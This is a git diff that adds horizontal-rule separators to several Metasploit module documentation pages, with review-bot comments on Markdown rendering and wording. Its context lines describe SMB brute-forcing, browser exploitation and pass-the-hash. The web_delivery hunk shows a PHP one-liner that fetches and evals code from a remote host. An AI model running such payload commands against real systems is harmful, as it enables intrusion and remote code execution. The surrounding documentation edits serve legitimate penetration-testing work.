Add --- to make sections to stand out more
parent
b82b1b0a47
commit
03eb568af7
|
@ -4,10 +4,14 @@ But feel free to add more content/sections to this.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
Instructions to get the vulnerable application.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
Example steps in this format:
|
||||
|
||||
1. Install the application
|
||||
|
@ -18,13 +22,17 @@ But feel free to add more content/sections to this.
|
|||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
**Option name**
|
||||
|
||||
Talk about what it does, and how to use it appropriately.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Specific demo of using the module:
|
||||
---
|
||||
|
||||
Specific demo of using the module that might be useful in a real world scenario.
|
||||
|
||||
```
|
||||
code or console output
|
||||
|
|
|
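Review bot: In the Scenarios part of this hunk, the new `---` sits directly below the line `Specific demo of using the module:`, and Markdown treats a text line immediately followed by `---` as a setext heading, so if that sentence is kept rather than deleted it will render as an H2 instead of a rule being drawn. Both the short sentence and the longer `Specific demo of using the module that might be useful in a real world scenario.` appear here, which suggests the template text is also being reworded, something the commit message does not mention. Suggest confirming the old sentence is removed, keeping a blank line above every `---`, and noting the wording change in the commit message.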
@ -4,10 +4,14 @@ and log into more machines.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB:
|
||||
|
||||
```
|
||||
|
@ -42,6 +46,8 @@ msf auxiliary(smb_login)
|
|||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will
|
||||
also need to supply user names and passwords. The following options are available to support
|
||||
different credential formats:
|
||||
|
|
|
@ -3,6 +3,8 @@ feel different for you. Here are the features you should know about before using
|
|||
|
||||
## Vulnerable Applications
|
||||
|
||||
---
|
||||
|
||||
Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:
|
||||
|
||||
* Internet Explorer
|
||||
|
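Review bot: The heading above the new rule in this hunk is `## Vulnerable Applications`, while the template and the smb_login, ms08_067_netapi and psexec docs touched by the same commit use `## Vulnerable Application`. Since each section heading is being edited for a uniform look anyway, consider aligning the heading name in the same pass.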
@ -14,6 +16,8 @@ Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins
|
|||
|
||||
## Exploit URLs
|
||||
|
||||
---
|
||||
|
||||
Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL
|
||||
you should send to the targets you wish to attack.
|
||||
|
||||
|
@ -29,6 +33,8 @@ used, including the URLs.
|
|||
|
||||
## Browser Autopwn 2 Options
|
||||
|
||||
---
|
||||
|
||||
**The HTMLContent Option**
|
||||
|
||||
The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a
|
||||
|
@ -137,6 +143,8 @@ set ExploitReloadTimeout 5000
|
|||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use
|
||||
different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to
|
||||
test a specific application, basically all you need to do is setting the
|
||||
|
@ -158,6 +166,8 @@ $ ./msfconsole -q -r scripts/resource/bap_flash_only.rc
|
|||
|
||||
## Logging
|
||||
|
||||
---
|
||||
|
||||
In addition, when a browser connects to BAP, this link-clicking event is also logged to the
|
||||
database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also
|
||||
save the exploit list information so that after testing you can go back to the database and see
|
||||
|
|
|
@ -11,6 +11,8 @@ say the target supports Powershell.
|
|||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
To be able to use web_delivery, you must gain access to the target machine first, with the ability
|
||||
to execute either the Python, or PHP, or Powershell interpreter.
|
||||
|
||||
|
@ -44,6 +46,8 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
|
|||
|
||||
## Targets
|
||||
|
||||
---
|
||||
|
||||
**Python**
|
||||
|
||||
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
|
||||
|
@ -61,6 +65,8 @@ don't come with it by default, but it is still possible to see it installed on a
|
|||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
**Against a compromised web application**
|
||||
|
||||
web_delivery would work nicely for a web application with a command execution vulnerability.
|
||||
|
|
|
@ -9,6 +9,8 @@ vulnerable code path, not just passively.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
This exploit works against a vulnerable SMB service from one of these Windows systems:
|
||||
|
||||
* Windows 2000
|
||||
|
@ -20,14 +22,20 @@ the system's patch level, or use a vulnerability check.
|
|||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
Please see Basic Usage under Overview.
|
||||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
Please see Required Options under Overview.
|
||||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
**Failure to detect the language pack**
|
||||
|
||||
On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this
|
||||
|
|
|
@ -9,6 +9,8 @@ you normally would with any Metasploit exploits.
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
---
|
||||
|
||||
To be able to use exploit/windows/smb/psexec, you must meet these requirements:
|
||||
|
||||
1. You have a valid username/password.
|
||||
|
@ -18,6 +20,8 @@ To be able to use exploit/windows/smb/psexec, you must meet these requirements:
|
|||
|
||||
## Verification Steps
|
||||
|
||||
---
|
||||
|
||||
At the minimum, you should be able use psexec to get a session with a valid credential:
|
||||
|
||||
```
|
||||
|
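Review bot: The context line right under the new rule in Verification Steps reads `you should be able use psexec`, which is missing a `to`. It is not part of this change, but the line is adjacent to the edit and could be fixed in the same commit.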
@ -46,6 +50,8 @@ meterpreter >
|
|||
|
||||
## Options
|
||||
|
||||
---
|
||||
|
||||
By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to
|
||||
go. But in reality, you will probably need to at least configure:
|
||||
|
||||
|
@ -59,6 +65,8 @@ This can be either the plain text version, or the Windows hash.
|
|||
|
||||
## Scenarios
|
||||
|
||||
---
|
||||
|
||||
|
||||
**Pass the Hash**
|
||||
|
||||
|
|